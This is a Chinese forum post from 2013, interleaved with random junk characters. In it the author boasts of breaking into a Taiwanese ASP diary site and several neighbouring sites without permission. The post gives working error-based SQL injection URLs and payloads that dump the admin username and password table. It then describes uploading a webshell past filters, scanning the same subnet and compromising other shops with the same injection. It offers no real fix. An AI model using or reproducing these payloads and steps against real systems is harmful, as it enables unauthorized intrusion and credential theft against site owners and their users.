发现一个注入点
- x# ^* j8 u! z; U2 }6 C4 n4 Qhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389$ ~7 _# x* R. p( u
. \. J/ U1 a: |0 W8 u
习惯性的加’having1=1--1 h" ~6 f+ l# P$ x4 J5 s
+ N5 B+ T% ]# e& I
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
: G8 B- y- A' q9 i" ` a* i( i6 E( ]* p
0- j* |; \$ o+ Y U- ?
$ R% e" t! w/ G: g' E* o爆出Diary_A.dl_Title(这时候很激动啊)1 N& G7 H0 q- B! `
/ j; o" W7 j" f* Y' |那么继续$ K: `3 r. T A& F& E$ f3 M
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
9 H8 n3 q& l# S1 ~2 V9 A4 q
! }" }( P! ?3 }继续,一直爆下去! k. M8 b6 {% F2 L' V$ u: G7 |
( i ~/ X2 y; ?7 a/ }; m爆到几个字段和表段 但是没找到需要的管理用户的字段6 K: n7 v% \2 ~$ u- W4 H( x) S G
' ^5 y, i1 \* a6 e+ i6 f) B蛋疼了 怎么办 然后去后台登陆页看源码
; d9 y8 P& w1 f! M9 K. C# E7 `" B0 {3 H3 r; R
0/ ^) K+ c# @- a! L0 s U6 c, r2 x
3 f. z- W! J) M% |. S- @) @* eInput name= “ADUID”4 ?. c& }7 D' E
Input name= “ADPWD”
5 H2 T. [ B5 r
4 G/ }6 c1 v3 K& l很幸运 找到了字段那就继续
! h! n) q4 e6 l% `. m* C找到之后开始爆用户+ r6 x F% z8 L u
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
2 [2 P: i: S# i7 a4 ]1 g i6 h爆密码
7 F; @ l7 m8 [* I; x. X% Xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
- I& @9 ~2 }, r' U& z4 E测试了下 这个注入点只能爆到文章哪里的表 7 J9 [+ H9 U, @! a
9 N6 F( S5 ~- o" L头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
3 R0 B4 ]0 p/ v' f4 n$ a1 ^! X5 [) k5 m, V3 ^* J$ I
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了* f: }& Z4 E$ v) v( [( e
4 Q) B$ N+ z+ @# p5 \
473
. ~2 Y W \5 T. v r
9 J; B6 q5 Q* z3 k1 F进后台
: V$ W0 H* L' v/ G9 ]: g3 T8 [* K
( T- \; h, U# a% U1 r5 S
+ [5 F( C/ p/ o, A9 e" ?发现几个上传点 有的地方不能上传 而且防止恶意代码
4 v8 r( z' G% z- H) t% y) d& R, a8 ]. |- O7 T. v
没办法 各种百度各种找大牛 找到一只好像可以突破的马3 O0 ]2 P" q4 Y0 g3 W
( X- [% P' J7 y9 d9 x6 V
7 {1 ]& f) d q- O0 k# l: p在系统管理那里直接上传 不过没有显示地址
! S9 m2 ^% w0 F0 z4 c1 Z) }+ `
8 t3 Y4 _- l% A& g+ l再上传一次 抓包 搞定OK
4 f9 W" N. v+ y0 C0 S, d% l5 M6 J6 o, G4 u3 _
0 _5 B( t/ |2 R' G& Q% A0 o
# k* M; r2 V$ y/ _3 C# w* y
472" P) v1 i9 ^: n. C/ i# K
0 c0 O+ y$ r4 P. Q$ L
晚上不行了 去睡觉。。。: ~+ [- j; t& c) x8 H, x9 X
第二天刚起床 闲的没事做继续日站吧 P) v: S9 P. m- g$ `0 I: a; j
1 o$ k3 j1 D8 N找个站 就把这个站的旁c扫了下
& @$ `3 t% J u) `
6 C3 J' ~9 F& F. i发现c段也有一个购物站 ,然后还和这个站的模板差不多7 N" d& |: f7 {
# B u5 M1 o/ t. j就找到会员登录口测试2 Z% F! c( l; ~3 \7 p# o8 m4 f% k
; b2 `* B) y, b, N' I1 ]* ^+ g8 a
'and (select top 1 MGR_UID from A_MGR)>0—5 i" @) m. q7 I x" q- C+ t
果断爆到了 这时候我很激动 通杀1 e9 @" y \# `8 Q$ O/ `
- \1 ^1 G# n! Y
再次翻c段
9 ^0 m k# {- J& o* e+ C R! D
) r" Z8 z- q1 T3 Y, C+ Y, C翻出几个站 都成功拿下; V( z' q2 T2 i; x6 F) t t4 N
0 w. n& [# D* d$ g# |
5 B. p, ?, z& L' ]3 W) @7 `, m6 v$ \" w" f3 x X2 D$ a
修复方案:& \. I& X1 s+ D+ Q2 r& O" t3 K
他们比我专业 " ^; U2 b+ z! q$ C
! c, w$ q( o9 M ?" Q' s+ m7 V1 W$ g7 ^+ }% X
3 _. X9 q6 U: G- C
|
发表于 2013-4-4 17:40:38
收藏
支持
反对